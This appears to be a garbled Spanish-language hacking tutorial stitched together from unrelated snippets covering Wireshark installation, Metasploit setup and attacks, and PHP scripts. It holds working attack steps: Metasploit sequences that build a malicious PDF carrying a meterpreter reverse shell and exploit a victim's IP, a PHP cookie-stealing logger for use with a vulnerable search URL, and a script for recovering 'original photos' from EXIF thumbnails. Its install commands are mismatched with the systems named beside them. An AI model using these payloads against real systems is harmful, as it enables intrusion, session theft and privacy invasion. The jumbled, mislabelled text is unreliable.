Requisitos pa mostrar tu Escritorio:
- Tener una distribucion Unix Linux.
- Tener entorno Gnome
Por que lo mas importante es tu Seguridad
Y ya está! Además la mayoría de las distribuciones lo incluyen en sus repositorios, por lo que lo tienes fácil en openSuse, Fedora, o Gentoo. Por ejemplo, en Gentoo:sudo apt-get install wireshark
O FreeBSD:USE=”adns gtk ipv6 portaudio snmp ssl kerberos threads selinux” emerge wireshark
Sin embargo, si lo que deseas/necesitas es instalarlo desde las fuentes, vamos por ello:pkg_add -r wireshark
tar zxvf wireshark-1.0.3.tar.gzProblemas experimentados: personalmente tuve que instalar manualmente bison, flex y gtk+; en muchos sistemas no es necesario, pero mejor que estés preparado.
cd wireshark-1.0.3/
./configure
make
sudo make install
wireshark
:show exploits
use ie_xp_pfv_metafile
Set LHOST Tu-IP
Set PAYLOAD Win32_reverse
set RHOST Ip-Víctima
Exploit
Luego deberemos dejar escuchando por la conexión reversa que se va a generar una vez que la víctima abra el PDF:
use windows/fileformat/adobe_pdf_embedded_exe set INFILENAME /tmp/programa.pdf set FILENAME evil.pdf set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.1.102 exploit
./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.102 E
# editamos el módulo: /framework3/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb # reemplazamos la siguiente línea: dirs = [ "Desktop", "My Documents", "Documents" ] # por la siguiente línea: dirs = [ "Desktop", "My Documents", "Documents", "Escritorio", "Mis Documentos" ]
set EXENAME /tmp/calc.exe set INFILENAME /tmp/programa.pdf exploit
set PAYLOAD windows/shell/bind_tcp
simplemente montalo en localhost, mete las fotos en la carpeta raíz y voilá , podrás ver las fotos originales .
<?php
set_time_limit ( 0 );
function getmicrotime () {
$temparray = split ( " " , microtime ());
$returntime = $temparray [ 0 ]+ $temparray [ 1 ];
return $returntime ;
}
$maindir = "." ;
$mydir = opendir ( $maindir ) ;
$starttime = getmicrotime ();
$i = 0 ;
while( $fn = readdir ( $mydir ))
{
$startimagetime = getmicrotime ();
$ext = strtolower ( substr ( $fn , strlen ( $fn )- 3 ));
if ( $ext == "jpg" ) {
$i ++;
echo $fn . " se proceso satisfactorio<br>" ;
flush ();
$image = exif_thumbnail ( $fn , $width , $height , $type );
if ( $image !== false ) {
$handle = fopen ( $fn . ".thumb.jpg" , 'a' );
echo "<img src='".$fn."' width='400' height='301' />";
echo "<img src='".$fn .".thumb.jpg' width='400' height='301' />";
fwrite ( $handle , $image );
} else {
echo "imagen de miniatura no disponible para: " . $fn . "<br>" ;
echo "<img src='".$fn.".thumb.jpg' width='400' height='301' />";
}
}
}
closedir ( $mydir );
$endtime = getmicrotime ();
echo "<br>Tiempo tardado " ;
print $endtime - $starttime ;
echo "<br> Imagenes procesadas: " . $i ;
?>
<?php
$ip = $_Server['REMOTE_ADDR'];
$co = $_GET[c];
$datos = "ip: " . $ip . "cookie: " . $co . "<br>" . "CorporatiOn StudiOs";
$archivo = fopen('almacen.txt', 'a');
fwrite($archivo,$datos);
fclose($archivo);
header("Location: http://webtuya.com");
?>
http://www.webvulnerableatodo.com/buscador.php?palabra=
sudo apt-get install ruby libruby rdocCuando los instalen todos nos metemos a la pagina de metasploit y descargamos metasploit
sudo apt-get install libyaml-ruby
sudo apt-get install libzlib-ruby
sudo apt-get install libopenssl-ruby
sudo apt-get install libdl-ruby
sudo apt-get install libreadline-ruby
sudo apt-get install libiconv-ruby
sudo apt-get install rubygems
sudo apt-get install libmysqlclient-dev
sudo sh ./framework-3.4.1-linux-i686.run“segun la version del metasploit cambia el nombre, solo vean el nombre del archivo que descargaron y vean que este bn escrito”
sudo msfconsoleesperan unos segundos y tendran corriendo metasploit, Ahora le tienen que indicar que base de datos usar, asi que teclean dentro de metasploit:
db_driver sqlite3les tendra que mostrar la siguiente salida: [*] Using database driver sqlite3